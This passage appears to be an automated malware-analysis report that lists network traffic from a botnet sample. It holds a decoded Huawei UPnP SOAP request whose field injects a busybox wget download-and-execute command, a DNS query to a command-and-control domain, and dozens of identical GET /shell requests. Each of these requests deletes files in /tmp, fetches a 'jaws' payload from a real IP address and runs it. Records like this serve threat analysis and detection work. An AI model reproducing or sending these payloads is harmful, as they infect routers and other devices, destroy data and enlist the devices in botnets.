3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: unknownDNS traffic detected: queries for: cnc.luxstresser.xyz
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
